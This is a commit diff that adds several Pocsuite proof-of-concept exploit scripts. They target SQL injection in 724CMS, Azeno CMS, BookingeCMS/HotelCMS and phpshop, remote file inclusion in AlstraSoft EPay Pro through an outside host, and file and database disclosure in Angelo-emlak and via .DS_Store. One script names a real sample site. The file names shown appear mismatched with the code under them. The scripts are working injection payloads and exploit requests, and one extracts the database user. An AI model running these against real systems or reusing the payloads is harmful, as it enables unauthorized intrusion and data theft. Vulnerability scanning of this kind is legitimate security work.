add all

Author: njcx

Diff for: .DS_Store

@@ -0,0 +1,48 @@
+#!/usr/bin/env python
+# coding: utf-8
+
+from pocsuite.net import req
+from pocsuite.poc import POCBase, Output
+from pocsuite.utils import register
+
+class TestPOC(POCBase):
+    vulID = 'SSV-65307'  # vul ID
+    version = '1'
+    author = ['hh']
+    vulDate = '2008-04-07'
+    createDate = '2015-10-16'
+    updateDate = '2015-10-16'
+    references = ['https://www.exploit-db.com/exploits/5400/']
+    name = '724CMS <= 4.01 Enterprise (index.php ID) SQL Injection Vulnerability'
+    appPowerLink = 'http://724cms.com/'
+    appName = '724cms'
+    appVersion = '<= 4.01'
+    vulType = 'SQL Injection'
+    desc = '''
+        724Networks 724CMS 4.01及其早期版本的index.php存在SQL注入漏洞。远程攻击者通过ID参数来执行任意SQL命令。
+    '''
+    # the sample sites for examine
+    samples = ['']
+
+    def _verify(self):
+        result = {}
+        payload = "/index.php?ID=1 UNION SELECT 1,md5(666),3,4,5,6,7,8--"
+        verify_url = self.url + payload
+        content = req.get(verify_url).content
+        if 'fae0b27c451c728867a567e8c1bb4e53' in content:
+            result['VerifyInfo'] = {}
+            result['VerifyInfo']['URL'] = verify_url
+        return self.parse_verify(result)
+
+    def _attack(self):
+        return self._verify()
+
+    def parse_verify(self, result):
+        output = Output(self)
+        if result:
+            output.success(result)
+        else:
+            output.fail('Internet Nothing returned')
+        return output
+
+register(TestPOC)

Diff for: 724CMS _= 4.01 Enterprise (index.php ID) SQL Injection Vulnerability.py

@@ -0,0 +1,53 @@
+#!/usr/bin/env python
+# coding: utf-8
+
+import re
+from pocsuite.net import req
+from pocsuite.poc import Output, POCBase
+from pocsuite.utils import register
+
+class AlstraSoft_EPay_Pro_Remote_File_Include(POCBase):
+    vulID = '78990'
+    version = '1'
+    vulDate = '2005-04-01'
+    author = ' '
+    createDate = '2015-12-16'
+    updateDate = ' '
+    references = ['http://www.sebug.net/vuldb/ssvid-78990']
+    name = 'AlstraSoft EPay Pro 2.0 - Remote File Include Vulnerability'
+    appPowerLink = ''
+    appName = 'AlstraSoft EPay Pro'
+    appVersion = '2.0'
+    vulType = 'Remote File Inclusion'
+    desc = ''
+    samples = ['']
+
+
+    def _attack(self):
+        return self._verify()
+
+
+    def _verify(self):
+        result = {}
+        vul_url = '%s/epal/index.php?view=http://tool.scanv.com/wsl/php_verify.txt?' % self.url
+        response = req.get(vul_url).content
+
+        if re.search('d4d7a6b8b3ed8ed86db2ef2cd728d8ec', response):
+            result['VerifyInfo'] = {}
+            result['VerifyInfo']['URL'] = self.url
+
+
+        return self.parse_attack(result)
+
+
+    def parse_attack(self, result):
+        output = Output(self)
+
+        if result:
+            output.success(result)
+        else:
+            output.fail('failed')
+
+        return output
+
+register(AlstraSoft_EPay_Pro_Remote_File_Include)

Diff for: AlstraSoft EPay Pro 2.0 - Remote File Include Vulnerability.py

@@ -0,0 +1,52 @@
+#!/usr/bin/env python
+# -*- coding:utf-8 -*-
+import re
+from pocsuite.net import req
+from pocsuite.poc import Output, POCBase
+from pocsuite.utils import register
+
+
+class Angelo_emlak_Database_Found(POCBase):
+    vulID = '67229'
+    version = '1'
+    vulDate = '2010-04-27'
+    author = 'anonymous'
+    createDate = '2015-11-15'
+    updateDate = '2015-11-15'
+    references = ['http://www.sebug.net/vuldb/ssvid-67229']
+    name = 'Angelo-emlak 1.0 - Database Disclosure Vulnerability'
+    appPowerLink = ''
+    appName = 'Angelo-emlak'
+    appVersion = ' '
+    vulType = 'Database Found'
+    desc = 'Angelo-Emlak在web根目录下保存敏感信息，但缺乏足够的访问控制，远程攻击者可以通过直接向veribaze/angelo.mdb发出请求，下载数据库。'
+    samples = ['http://burdurdaemlak.com']
+
+
+    def _attack(self):
+        return self._verify()
+
+
+    def _verify(self):
+        result = {}
+        vul_url = '%s/veribaze/angelo.mdb' % self.url
+        response = req.get(vul_url).content
+
+        if re.search('Standard Jet DB', response):
+            result['VerifyInfo'] = {}
+            result['VerifyInfo']['URL'] = self.url
+
+        return self.parse_attack(result)
+
+
+    def parse_attack(self, result):
+        output = Output(self)
+
+        if result:
+            output.success(result)
+        else:
+            output.fail('failed')
+
+        return output
+
+register(Angelo_emlak_Database_Found)

Diff for: Angelo-emlak 1.0 - Database Disclosure Vulnerability.py

@@ -0,0 +1,62 @@
+#!/usr/bin/env python
+# coding: utf-8
+import re
+
+from pocsuite.net import req
+from pocsuite.poc import POCBase, Output
+from pocsuite.utils import register
+
+from ds_store import DSStore
+
+class TestPOC(POCBase):
+    vulID = '1729'  # vul ID
+    version = '1'
+    author = ['ricter']
+    vulDate = '2015-03-09'
+    createDate = '2015-03-09'
+    updateDate = '2015-03-09'
+    references = ['http://www.securityfocus.com/bid/3324/discuss']
+    name = 'Apple Macintosh OS X .DS_Store Information Disclosure'
+    appPowerLink = 'http://www.apple.com'
+    appName = 'Apple Macintosh OS X'
+    appVersion = 'all version'
+    vulType = 'Information Disclosure'
+    desc = '''
+        在开发过程中开发者可能会把 .DS_Store 文件上传到网站上导致
+        信息泄露漏洞。
+    '''
+
+    samples = ['']
+    install_requires = ['ds_store==1.0.1']
+
+    def _attack(self):
+        return self._verify()
+
+    def _verify(self):
+        result = {}
+        url = '%s/.DS_Store' % self.url
+        response = req.get(url).content
+        filelist = []
+        if '\x00\x00\x00\x01\x42\x75\x64\x31' in response:
+            try:
+                with DSStore.open(response, 'r+') as obj:
+                        for i in obj:
+                            filelist.append(i.filename)
+            except Exception, e:
+                print '[-] Error: %s' % str(e)
+            result['FileInfo'] = {}
+            result['FileInfo']['Filename'] = url
+            result['FileInfo']['Content']  = set(list(filelist))
+
+        return self.parse_attack(result)
+
+    def parse_attack(self, result):
+        output = Output(self)
+        if result:
+            output.success(result)
+        else:
+            output.fail('Internet nothing returned')
+        return output
+
+
+register(TestPOC)

Diff for: Apple Macintosh OS X .DS_Store 信息泄露漏洞.py

@@ -0,0 +1,45 @@
+#!/usr/bin/env python
+# coding: utf-8
+
+from pocsuite.net import req
+from pocsuite.poc import POCBase, Output
+from pocsuite.utils import register
+
+class TestPOC(POCBase):
+    vulID = 'SSV-67893'  # vul ID
+    version = '1'
+    author = 'hzr'
+    vulDate = '2010-03-13'
+    createDate = '2015-10-23'
+    updateDate = '2015-10-23'
+    references = ['https://www.exploit-db.com/exploits/11711/']
+    name = 'Azeno CMS - SQL Injection Vulnerability'
+    appPowerLink = 'N/A'
+    appName = 'Azeno'
+    appVersion = 'N/A'
+    vulType = 'SQL Injection'
+    desc = '''
+        Azeno CMS的/admin/index.php 文件"id" 变量没有进行过滤，造成SQL注入
+    '''
+    # the sample sites for examine
+    samples = ['']
+
+    def _verify(self):
+        output = Output(self)
+        result = {}
+        #根据Pocsuite格式要求，定义一个特殊输出字符串，验证sql注入是否成功
+        payload = "/admin/index.php?id=-1 UNION SELECT 1,CONCAT(0x7165696a71,CAST(md5(23333) AS CHAR),0x20),3,4,5,6,7 FROM dc_user"       
+        verify_url = self.url + payload
+        content = req.get(verify_url).content
+        if "qeijq0ba7bc92fcd57e337ebb9e74308c811f" in content:
+            result['VerifyInfo'] = {}
+            result['VerifyInfo']['URL'] = verify_url
+            output.success(result)
+        else:
+            output.fail('SQL Injection Failed')
+        return output
+
+    def _attack(self): 
+        return self._verify()
+
+register(TestPOC)

Diff for: Azeno CMS SQL Injection Vulnerability.py

@@ -0,0 +1,64 @@
+#!/usr/bin/env python
+# coding: utf-8
+import re
+from pocsuite.api.request import req
+from pocsuite.api.poc import register
+from pocsuite.api.poc import Output, POCBase
+
+
+class TestPOC(POCBase):
+    vulID = ''  # ssvid
+    version = '1.0'
+    author = ['kenan']
+    vulDate = ''
+    createDate = '2016-06-06'
+    updateDate = '2016-06-06'
+    references = ['http://www.seebug.org/vuldb/ssvid-']
+    name = ''
+    appPowerLink = ''
+    appName = ''
+    appVersion = ''
+    vulType = ''
+    desc = '''
+    '''
+    samples = ['']
+    install_requires = ['']
+    #请尽量不要使用第三方库，必要时参考 https://github.com/knownsec/Pocsuite/blob/master/docs/CODING.md#poc-第三方模块依赖说明 填写该字段
+
+    def _attack(self):
+        result = {}
+        #Write your code here
+        vulurl = "%s" % self.url
+        payload = "/?m=info.detail&id=1 AND (SELECT 1 FROM(SELECT COUNT(*),CONCAT(0x7e7e7e,(MID((IFNULL(CAST(CURRENT_USER() AS CHAR),0x20)),1,50)),0x7e7e7e,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)"
+        resp = req.get(vulurl+ payload)
+        re_result = re.findall(r'~~~(.*?)~~~', resp.content, re.S|re.I)
+        vulurl1 = "%s/?m=city.getSearch&index=xx" % self.url
+        payload1 = {"key":"xxx' AND (SELECT 7359 FROM(SELECT COUNT(*),CONCAT(0x7e7e7e,(MID((IFNULL(CAST(CURRENT_USER() AS CHAR),0x20)),1,50)),0x7e7e7e,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'xx'='xx"}
+        resp1 = req.post(vulurl,data =payload1)
+        re_result1 = re.findall(r'~~~(.*?)~~~', resp1.content, re.S|re.I)
+        if re_result  :
+            result['VerifyInfo'] = {}
+            result['VerifyInfo']['URL'] = vulurl
+            result['VerifyInfo']['Payload'] = payload
+            return self.parse_output(result)
+        if re_result1 :
+            result['VerifyInfo'] = {}
+            result['VerifyInfo']['URL'] = vulurl1
+            result['VerifyInfo']['Payload'] = payload1
+            return self.parse_output(result)
+
+    def _verify(self):
+        result = {}
+        return self._attack()
+
+    def parse_output(self, result):
+        #parse output
+        output = Output(self)
+        if result:
+            output.success(result)
+        else:
+            output.fail('Internet nothing returned')
+        return output
+
+
+register(TestPOC)

Diff for: BookingeCMS HotelCMS酒店预订管理系统key和m=info.detail id存在注入.py

@@ -0,0 +1,50 @@
+#!/usr/bin/env python
+# coding: utf-8
+
+from pocsuite.net import req
+from pocsuite.poc import POCBase, Output
+from pocsuite.utils import register
+import re
+
+class TestPOC(POCBase):
+    vulID = 'SSV-77845'  # vul ID
+    version = '1'
+    author = ['hh']
+    vulDate = '2013-01-14'
+    createDate = '2015-10-16'
+    updateDate = '2015-10-16'
+    references = ['https://www.exploit-db.com/exploits/24108/']
+    name = 'CMS phpshop 2.0 - SQL Injection Vulnerability'
+    appPowerLink = 'http://code.google.com/p/phpshop/downloads/list'
+    appName = 'phpshop'
+    appVersion = '2.0'
+    vulType = 'SQL Injection'
+    desc = '''
+           ?page=admin/function_list&module_id=11 id变量未正确过滤,导致SQL注入漏洞
+    '''
+    # the sample sites for examine
+    samples = ['']
+
+    def _verify(self):
+        result = {}
+        target_url = "/phpshop 2.0/?page=admin/function_list&module_id=11' union select 1,CONCAT(0x7162787671,0x50664e68584e4c584352,0x716a717171),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 --"      
+        response = req.get(self.url + target_url, headers=self.headers, timeout=10)
+        content = response.content     
+        match = re.search('qbxvqPfNhXNLXCRqjqqq',content)
+        if match:
+            result['VerifyInfo'] = {}
+            result['VerifyInfo']['URL'] = self.url + target_url
+        return self.parse_attack(result)
+
+    def _attack(self):
+        return self._verify()
+
+    def parse_attack(self, result):
+        output = Output(self)
+        if result:
+            output.success(result)
+        else:
+            output.fail('Internet Nothing returned')
+        return output
+
+register(TestPOC)